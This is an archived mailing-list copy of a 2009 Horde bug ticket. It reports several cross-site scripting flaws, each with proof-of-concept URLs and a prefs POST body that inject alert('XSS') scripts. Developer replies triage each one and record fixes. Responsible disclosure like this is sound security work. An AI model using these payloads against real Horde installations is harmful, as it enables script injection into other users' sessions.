|
»
[Tickets #8399] Multiple Cross Site Scripting Vulnerabilities
|
View:
New views
3 Messages
—
Rating Filter:
Alert me
|
 |
[Tickets #8399] Multiple Cross Site Scripting Vulnerabilities
by bugs-14
::
Rate this Message:
Reply (Restricted by the Administrator) | Reply to Author | View Threaded | Show Only this Message DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/8399 ------------------------------------------------------------------------------ Ticket | 8399 Created By | security@... Summary | Multiple Cross Site Scripting Vulnerabilities Queue | Horde Base Version | 3.1 Type | Bug State | Unconfirmed Priority | 2. Medium Milestone | Patch | Owners | ------------------------------------------------------------------------------ security@... (2009-07-03 14:48) wrote: Multiple cross site scripting vulnerabilites exist. Proof of concepts: http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script> https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs[" https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script> POST to http://hordeserver.com/horde/services/prefs.php with the following content: actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on -- You are subscribed to this list as: lists@... To unsubscribe, mail: bugs-unsubscribe@... |
|
|
[Tickets #8399] Re: Number preferences are not validated properly
by bugs-14
::
Rate this Message:
Reply (Restricted by the Administrator) | Reply to Author | View Threaded | Show Only this Message DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/8399 ------------------------------------------------------------------------------ Ticket | 8399 Updated By | Chuck Hagenbuch <chuck@...> -Summary | Multiple Cross Site Scripting Vulnerabilities +Summary | Number preferences are not validated properly Queue | Horde Base -Version | 3.1 +Version | HEAD Type | Bug -State | Unconfirmed +State | Assigned Priority | 2. Medium -Milestone | +Milestone | 3.3.5 Patch | -Owners | +Owners | Horde Developers, Chuck Hagenbuch ------------------------------------------------------------------------------ Chuck Hagenbuch <chuck@...> (2009-07-11 17:08) wrote: > Multiple cross site scripting vulnerabilites exist. Proof of concepts: Horde 3.1 has been deprecated for a long time. The current stable version is 3.3, and we backport serious security fixes to 3.2. > http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script> > https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs[" This file doesn't exist in 3.2 or later. > https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script> This was fixed almost 2 years ago, before 3.2.0: http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&r2=1.9 > POST to http://hordeserver.com/horde/services/prefs.php with the > following content: > actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on This I can actually reproduce as a problem. Patch forthcoming. -- You are subscribed to this list as: lists@... To unsubscribe, mail: bugs-unsubscribe@... |
|
|
[Tickets #8399] Re: Number preferences are not validated properly
by bugs-14
::
Rate this Message:
Reply (Restricted by the Administrator) | Reply to Author | View Threaded | Show Only this Message DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/8399 ------------------------------------------------------------------------------ Ticket | 8399 Updated By | Chuck Hagenbuch <chuck@...> Summary | Number preferences are not validated properly Queue | Horde Base Version | HEAD Type | Bug -State | Assigned +State | Resolved Priority | 2. Medium Milestone | 3.3.5 Patch | -Owners | Horde Developers, Chuck Hagenbuch +Owners | Chuck Hagenbuch ------------------------------------------------------------------------------ Chuck Hagenbuch <chuck@...> (2009-07-11 19:40) wrote: Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cvs). -- You are subscribed to this list as: lists@... To unsubscribe, mail: bugs-unsubscribe@... |
| Free embeddable forum powered by Nabble | Forum Help |
